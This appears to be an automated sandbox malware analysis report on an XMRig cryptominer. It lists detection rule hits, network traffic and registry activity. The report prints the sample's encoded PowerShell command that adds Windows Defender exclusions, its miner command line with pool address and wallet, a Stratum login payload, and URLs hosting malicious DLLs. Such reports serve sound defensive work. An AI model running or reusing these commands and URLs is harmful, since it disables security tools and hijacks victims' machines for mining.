Author: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAF

Sigma detected: Network Connection Initiated By AddinUtil.EXE

Source: Network Connection

Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri): Data: DestinationIp: 45.11.229.96, DestinationIsIpv6: false, DestinationPort: 39001, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, Initiated: true, ProcessId: 6044, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Uncommon Child Process Of AddinUtil.EXE

Source: Process started

Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, ParentProcessId: 6044, ParentProcessName: AddInUtil.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 5808, ProcessName: AddInProcess.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAF

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 2172, ProcessName: svchost.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:25:23.498854+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.5	59539	1.1.1.1	53	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:25:04.746990+0200	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.5	49718	45.76.89.70	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: o9OIGsDt4m.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Avira: detection malicious, Label: HEUR/AGEN.1358722

Multi AV Scanner detection for domain / URL

Source: 2x.si	Virustotal: Detection: 15%	Perma Link
Source: pool.hashvault.pro	Virustotal: Detection: 7%	Perma Link
Source: https://files.catbox.moe/k541xr.dll	Virustotal: Detection: 9%	Perma Link
Source: https://2x.si/o3M.dll	Virustotal: Detection: 12%	Perma Link
Source: https://files.catbox.moe/kwfxr7.dll	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Virustotal: Detection: 41%			Perma Link

Multi AV Scanner detection for submitted file

Source: o9OIGsDt4m.exe	ReversingLabs: Detection: 52%
Source: o9OIGsDt4m.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: o9OIGsDt4m.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.AddInUtil.exe.23c653b70f0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInUtil.exe.23c653b70f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4581896540.0000023F78A26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4560506841.0000000140799000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4581896540.0000023F789F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4614043790.0000023C653B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4560506841.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInUtil.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 5808, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.5:49718 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 33 69 39 58 71 65 62 44 69 36 63 58 56 31 41 45 44 4c 77 62 4a 41 78 79 32 6f 72 6d 59 6a 34 4e 62 76 4e 42 35 4c 5a 44 75 37 54 57 6f 65 39 6f 72 65 76 66 73 5a 50 42 62 33 4c 74 53 62 50 55 58 62 76 39 62 7a 55 41 62 46 5a 69 52 4e 51 32 7a 66 69 67 65 44 5a 37 61 43 57 66 39 39 2e 52 49 47 5f 43 50 55 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 34 2e 32 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43i9xqebdi6cxv1aedlwbjaxy2ormyj4nbvnb5lzdu7twoe9orevfszpbb3ltsbpuxbv9bzuabfzirnq2zfigedz7acwf99.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

Found strings related to Crypto-Mining

Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C653B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.21.0

Source: unknown

HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.5:49709 version: TLS 1.2

Source: o9OIGsDt4m.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D324000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2130015050.000001FA0CB80000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C1904000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D324000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2130015050.000001FA0CB80000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C1904000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
